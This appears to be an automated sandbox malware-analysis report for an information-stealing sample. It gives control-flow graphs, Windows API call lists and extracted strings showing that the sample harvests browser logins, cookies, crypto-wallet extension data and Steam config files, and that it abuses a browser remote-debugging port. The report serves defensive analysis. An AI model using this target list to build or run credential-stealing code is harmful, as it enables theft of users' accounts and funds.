990->996 992->874 1165 408b00-408b03 993->1165 1003 408b48-408b56 996->1003 1004 4092ad-40937f memset call 410530 lstrcatA call 410530 lstrcatA * 2 call 410530 * 3 call 410200 * 4 996->1004 1008 408ff3-4090c0 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 1000->1008 1009 408d4a-408d58 StrCmpCA 1000->1009 1001->989 1011 40884a-408857 1001->1011 1003->874 1013 408b5c-408be7 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 1003->1013 1163 409385-409397 call 407110 1004->1163 1239 4090c5-4090c9 1008->1239 1009->989 1019 408d5e-408e10 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA 1009->1019 1021 408f24-408fee memset call 410530 lstrcatA call 410530 lstrcatA * 2 call 410530 * 2 call 410200 * 4 1011->1021 1022 40885d-40886b 1011->1022 1202 408bf0-408c13 call 410530 * 2 CopyFileA 1013->1202 1226 408e16-408e32 call 410200 call 4076b0 1019->1226 1227 408f19-408f1f 1019->1227 1021->1163 1022->874 1032 408871-40890d call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 1022->1032 1222 408910-40891f call 410530 CopyFileA 1032->1222 1097 4089fd 1096->1097 1097->989 1178 40939c-40939e 1163->1178 1165->992 1178->1097 1229 408c15-408c39 call 410200 call 411d20 Sleep 1202->1229 1230 408c4a-408c75 call 410200 call 4076b0 1202->1230 1242 408925-40894d call 410200 call 411d20 call 410530 1222->1242 1243 4091cd-4091f8 call 410200 call 4076b0 1222->1243 1260 408e37-408e3b 1226->1260 1233 4091b0-4091bc call 410530 DeleteFileA call 4104e0 1227->1233 1229->1202 1264 408c3b-408c45 call 410290 1229->1264 1268 4093b8 1230->1268 1269 408c7b-408d2b call 410340 call 410200 * 4 call 413e50 call 410230 1230->1269 1273 4091c1-4091c8 call 410230 1233->1273 1249 4091a4-4091aa 1239->1249 1250 4090cf-40919f call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1239->1250 1242->1222 1286 4093a3-4093a5 1243->1286 1287 4091fe-4092a8 call 410340 call 410200 * 4 call 413e50 call 410230 1243->1287 1249->1233 1250->1249 1270 408e41-408f0e call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1260->1270 1271 408f13 1260->1271 1264->1230 1276 4093bf-4093c6 call 410230 1268->1276 1269->1276 1270->1271 1271->1227 1273->1097 1276->874 1297 4093ac-4093b3 call 410230 1286->1297 1287->1297 1297->874 1306->1307 1307->970
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00408311
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040839B
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcatlstrlenmemcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
                                                                                                                                                                                                                                                                                                  • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite
                                                                                                                                                                                                                                                                                                  • API String ID: 664854069-3644845557
                                                                                                                                                                                                                                                                                                  • Opcode ID: c893ee9270e6230d199f5959aaf74bf23c1c56a4b0d6b0bdfe922e9bb5329de1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4855d12272032d1875a7082c41d92aaf51c32be0ad940928e656d1a7aac375ca
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c893ee9270e6230d199f5959aaf74bf23c1c56a4b0d6b0bdfe922e9bb5329de1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FB2A331A006199BCB10EFA1CD95AEEB779BF48304F40419EF8056B192DF78AEC5CB95
                                                                                                                                                                                                                                                                                                  Function 00413FF0 Relevance: 68.9, APIs: 31, Strings: 8, Instructions: 667stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2248 413ff0-41405d call 41e9b0 wsprintfA FindFirstFileA memset * 2 2251 4146b1-4146d7 call 410230 * 4 2248->2251 2252 414063-414081 2248->2252 2279 4146da-4146e2 call 410230 2251->2279 2253 4140ae-4140e2 call 402400 2252->2253 2260 414100 2253->2260 2261 4140e4-4140ef strlen 2253->2261 2263 414102-414111 2260->2263 2261->2263 2265 414150-414154 2263->2265 2266 414113-414120 2263->2266 2267 414245-414251 2265->2267 2268 41415a-41418e call 402400 2265->2268 2270 414122 2266->2270 2271 414128-414135 memcmp 2266->2271 2274 414253-414265 2267->2274 2275 414299-41429b 2267->2275 2287 414190-4141a1 strlen 2268->2287 2288 4141a3 2268->2288 2270->2271 2271->2268 2276 414137-414139 2271->2276 2280 414290-414296 ??3@YAXPAX@Z 2274->2280 2281 414267-414269 2274->2281 2282 4142a1-4142d6 wsprintfA StrCmpCA 2275->2282 2283 414090-4140a8 FindNextFileA 2275->2283 2276->2268 2277 41413b-41413d 2276->2277 2277->2267 2286 414143 2277->2286 2279->2251 2280->2275 2291 4146e4-41474f _invalid_parameter_noinfo_noreturn call 410530 * 2 GetLogicalDriveStringsA 2281->2291 2292 41426f-414274 2281->2292 2284 4142d8-4142ed 2282->2284 2285 4142ef-414306 2282->2285 2283->2253 2289 4146a8-4146ab FindClose 2283->2289 2303 414309-414335 memset lstrcatA 2284->2303 2285->2303 2286->2268 2293 4141a5-4141b4 2287->2293 2288->2293 2289->2251 2335 414755-414785 2291->2335 2336 414a0e-414a68 call 410230 * 8 2291->2336 2292->2291 2295 41427a-41427f 2292->2295 2299 4141e0-4141e7 2293->2299 2300 4141b6-4141c3 2293->2300 2295->2291 2301 414285-414288 2295->2301 2307 4141e9-4141ec 2299->2307 2308 4141ef-4141fd 2299->2308 2304 4141c5 2300->2304 2305 4141cb-4141de memcmp 2300->2305 2301->2291 2306 41428e 2301->2306 2309 414340-41434a strtok_s 2303->2309 2304->2305 2305->2299 2305->2308 2306->2280 2307->2308 2308->2267 2311 4141ff-414211 2308->2311 2314 414370-41439a memset lstrcatA 2309->2314 2315 41434c-41435e 2309->2315 2312 414213-414215 2311->2312 2313 41423c-414242 ??3@YAXPAX@Z 2311->2313 2312->2291 2318 41421b-414220 2312->2318 2313->2267 2319 4143c8-4143d2 strtok_s 2314->2319 2321 4145a0-4145a7 2315->2321 2329 414364-41436c 2315->2329 2318->2291 2320 414226-41422b 2318->2320 2319->2321 2322 4143d8-4143e2 PathMatchSpecA 2319->2322 2320->2291 2326 414231-414234 2320->2326 2321->2283 2324 4145ad-4145b9 2321->2324 2327 4143e4-4144b9 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 DeleteFileA call 410530 CopyFileA call 410530 call 411b80 call 41e900 2322->2327 2328 4143bd-4143c6 2322->2328 2324->2289 2330 4145bf-4145c6 2324->2330 2326->2291 2332 41423a 2326->2332 2419 4143a0-4143b7 call 410530 DeleteFileA call 410230 2327->2419 2420 4144bf-4144ce 2327->2420 2328->2319 2329->2309 2330->2283 2334 4145cc-41469b call 410200 * 4 call 413ff0 2330->2334 2332->2313 2375 4146a0-4146a3 2334->2375 2339 414790-4148e8 memset GetDriveTypeA call 410530 call 4119b0 lstrcpyA call 410530 * 3 call 410200 * 4 call 413ff0 2335->2339 2407 4148ed-414900 lstrlenA 2339->2407 2375->2283 2407->2339 2409 414906 2407->2409 2409->2336 2419->2328 2420->2279 2421 4144d4-4144fc call 410200 call 4076b0 2420->2421 2430 414502-414592 call 4101c0 call 410200 * 4 call 413e50 call 410230 2421->2430 2431 414597-41459e call 410230 2421->2431 2430->2431 2431->2321
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414012
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414039
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041404F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004140E5
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00414197
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                                                  • API String ID: 330858031-1484801792
                                                                                                                                                                                                                                                                                                  • Opcode ID: 36e3530557f26695959d15d3286dd14327cc8fd271dfcdd65ad83458a501a66f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36e3530557f26695959d15d3286dd14327cc8fd271dfcdd65ad83458a501a66f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94
                                                                                                                                                                                                                                                                                                  Function 00414BD0 Relevance: 49.6, APIs: 22, Strings: 6, Instructions: 553stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 3099 414bd0-414c0b wsprintfA FindFirstFileA 3100 414c11-414c2c 3099->3100 3101 414fa2-414fcb call 410230 * 4 3099->3101 3103 414c6a-414ca0 call 402400 3100->3103 3109 414cc0 3103->3109 3110 414ca2-414cb3 strlen 3103->3110 3111 414cc2-414cd1 3109->3111 3110->3111 3113 414d10-414d14 3111->3113 3114 414cd3-414cda 3111->3114 3119 414e05-414e0e 3113->3119 3120 414d1a-414d4e call 402400 3113->3120 3116 414ce2-414cf5 memcmp 3114->3116 3117 414cdc 3114->3117 3116->3120 3121 414cf7-414cf9 3116->3121 3117->3116 3124 414e10-414e22 3119->3124 3125 414e56-414e58 3119->3125 3135 414d50-414d61 strlen 3120->3135 3136 414d63 3120->3136 3121->3120 3128 414cfb-414cfd 3121->3128 3130 414e24-414e26 3124->3130 3131 414e4d-414e53 ??3@YAXPAX@Z 3124->3131 3126 414c52-414c64 FindNextFileA 3125->3126 3127 414e5e-414eeb call 411250 * 2 lstrcatA * 6 call 4101c0 call 4076b0 3125->3127 3126->3103 3134 414f88-414f9d FindClose call 411250 3126->3134 3172 414ef1-414f83 call 4101c0 call 410200 * 4 call 413e50 call 410230 3127->3172 3173 414c30-414c4d call 411250 * 2 3127->3173 3128->3119 3133 414d03 3128->3133 3137 414e2c-414e31 3130->3137 3138 414fce-415077 _invalid_parameter_noinfo_noreturn RegOpenKeyExA 3130->3138 3131->3125 3133->3120 3134->3101 3142 414d65-414d74 3135->3142 3136->3142 3137->3138 3139 414e37-414e3c 3137->3139 3146 415096-415210 RegCloseKey call 411250 lstrcatA * 2 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 3138->3146 3147 415079-415090 RegQueryValueExA 3138->3147 3139->3138 3144 414e42-414e45 3139->3144 3148 414da0-414da7 3142->3148 3149 414d76-414d83 3142->3149 3144->3138 3152 414e4b 3144->3152 3217 415215-415390 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 411250 call 410230 * 4 3146->3217 3147->3146 3153 414da9-414dac 3148->3153 3154 414daf-414dbd 3148->3154 3150 414d85 3149->3150 3151 414d8b-414d9e memcmp 3149->3151 3150->3151 3151->3148 3151->3154 3152->3131 3153->3154 3154->3119 3157 414dbf-414dd1 3154->3157 3160 414dd3-414dd5 3157->3160 3161 414dfc-414e02 ??3@YAXPAX@Z 3157->3161 3160->3138 3164 414ddb-414de0 3160->3164 3161->3119 3164->3138 3168 414de6-414deb 3164->3168 3168->3138 3171 414df1-414df4 3168->3171 3171->3138 3176 414dfa 3171->3176 3172->3173 3173->3126 3176->3161
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\
                                                                                                                                                                                                                                                                                                  • API String ID: 3353021899-493467598
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48a5a0ea295394bbc1bfe68b8dbef3a9faf1c547344738b0927ef86f7acc5891
                                                                                                                                                                                                                                                                                                  • Instruction ID: f04b4360dc0817d558250c3cdd1667f1ca9511f4c4837c2270bb77207d21b6f3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a5a0ea295394bbc1bfe68b8dbef3a9faf1c547344738b0927ef86f7acc5891
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1132B531C007589BDF10EF65CD85AEDB778BF58304F00929AF90967152EB78AAC5CB94
                                                                                                                                                                                                                                                                                                  Function 00407060 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 448stringsleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
